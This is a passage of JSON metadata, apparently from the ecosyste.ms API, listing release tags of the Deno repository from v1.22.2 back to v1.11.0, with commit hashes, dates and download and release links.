//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2c